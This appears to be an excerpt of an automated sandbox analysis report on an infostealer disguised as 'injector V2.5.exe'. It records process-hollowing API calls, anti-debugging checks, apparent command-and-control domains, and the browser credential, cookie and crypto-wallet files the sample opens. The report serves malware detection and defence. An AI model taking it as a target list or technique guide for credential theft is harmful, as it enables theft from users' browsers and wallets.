              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B2D07E mov edi, dword ptr fs:[00000030h]0_2_00B2D07E
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B32C40 mov eax, dword ptr fs:[00000030h]0_2_00B32C40
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B32C40 mov eax, dword ptr fs:[00000030h]0_2_00B32C40
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B2CD0A mov edi, dword ptr fs:[00000030h]0_2_00B2CD0A
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B2E93A mov edi, dword ptr fs:[00000030h]0_2_00B2E93A
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B2CD0A mov edi, dword ptr fs:[00000030h]0_2_00B2CD0A
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B2D6B8 mov edi, dword ptr fs:[00000030h]0_2_00B2D6B8
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B2D6B8 mov edi, dword ptr fs:[00000030h]0_2_00B2D6B8
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B2DA6C mov edi, dword ptr fs:[00000030h]0_2_00B2DA6C
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B32B9B mov eax, dword ptr fs:[00000030h]0_2_00B32B9B
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B32B9B mov eax, dword ptr fs:[00000030h]0_2_00B32B9B
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B2E350 mov edi, dword ptr fs:[00000030h]0_2_00B2E350
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B32AA0 mov eax, dword ptr fs:[00000030h]2_2_00B32AA0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B32AA0 mov eax, dword ptr fs:[00000030h]2_2_00B32AA0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B32AA0 mov eax, dword ptr fs:[00000030h]2_2_00B32AA0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B32AA0 mov eax, dword ptr fs:[00000030h]2_2_00B32AA0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B32AA0 mov eax, dword ptr fs:[00000030h]2_2_00B32AA0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B2CCC0 mov edi, dword ptr fs:[00000030h]2_2_00B2CCC0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B2CCC0 mov edi, dword ptr fs:[00000030h]2_2_00B2CCC0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B2CCC0 mov edi, dword ptr fs:[00000030h]2_2_00B2CCC0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B2CCC0 mov edi, dword ptr fs:[00000030h]2_2_00B2CCC0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B2CCC0 mov edi, dword ptr fs:[00000030h]2_2_00B2CCC0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B2CCC0 mov edi, dword ptr fs:[00000030h]2_2_00B2CCC0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B2CCC0 mov edi, dword ptr fs:[00000030h]2_2_00B2CCC0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B2CCC0 mov edi, dword ptr fs:[00000030h]2_2_00B2CCC0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B4CB10 GetProcessHeap,0_2_00B4CB10
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B4902F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B4902F
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B496A3 SetUnhandledExceptionFilter,0_2_00B496A3
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B496AF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B496AF
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B4B79A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B4B79A
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B4902F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00B4902F
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B496A3 SetUnhandledExceptionFilter,2_2_00B496A3
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B496AF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00B496AF
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B4B79A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00B4B79A

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B5D18D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00B5D18D
              Source: C:\Users\user\Desktop\injector V2.5.exeMemory written: C:\Users\user\Desktop\injector V2.5.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: injector V2.5.exe, 00000000.00000002.1695674213.000000000327A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: p3ar11fter.sbs
              Source: injector V2.5.exe, 00000000.00000002.1695674213.000000000327A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 3xp3cts1aim.sbs
              Source: injector V2.5.exe, 00000000.00000002.1695674213.000000000327A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: peepburry828.sbs
              Source: injector V2.5.exe, 00000000.00000002.1695674213.000000000327A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: p10tgrace.sbs
              Source: injector V2.5.exe, 00000000.00000002.1695674213.000000000327A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: processhol.sbs
              Source: injector V2.5.exe, 00000000.00000002.1695674213.000000000327A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: revirepart.biz
              Source: C:\Users\user\Desktop\injector V2.5.exeProcess created: C:\Users\user\Desktop\injector V2.5.exe "C:\Users\user\Desktop\injector V2.5.exe"Jump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B498D5 cpuid 0_2_00B498D5
              Source: C:\Users\user\Desktop\injector V2.5.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B49566 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00B49566
              Source: C:\Users\user\Desktop\injector V2.5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: injector V2.5.exe PID: 4928, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: injector V2.5.exe, 00000002.00000003.1849885737.00000000033F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: llets/ElectronCashK
              Source: injector V2.5.exe, 00000002.00000003.1849885737.00000000033F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: injector V2.5.exe, 00000002.00000003.1849885737.00000000033F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
              Source: injector V2.5.exe, 00000002.00000003.1849885737.00000000033F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: injector V2.5.exe, 00000002.00000003.1849885737.00000000033F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
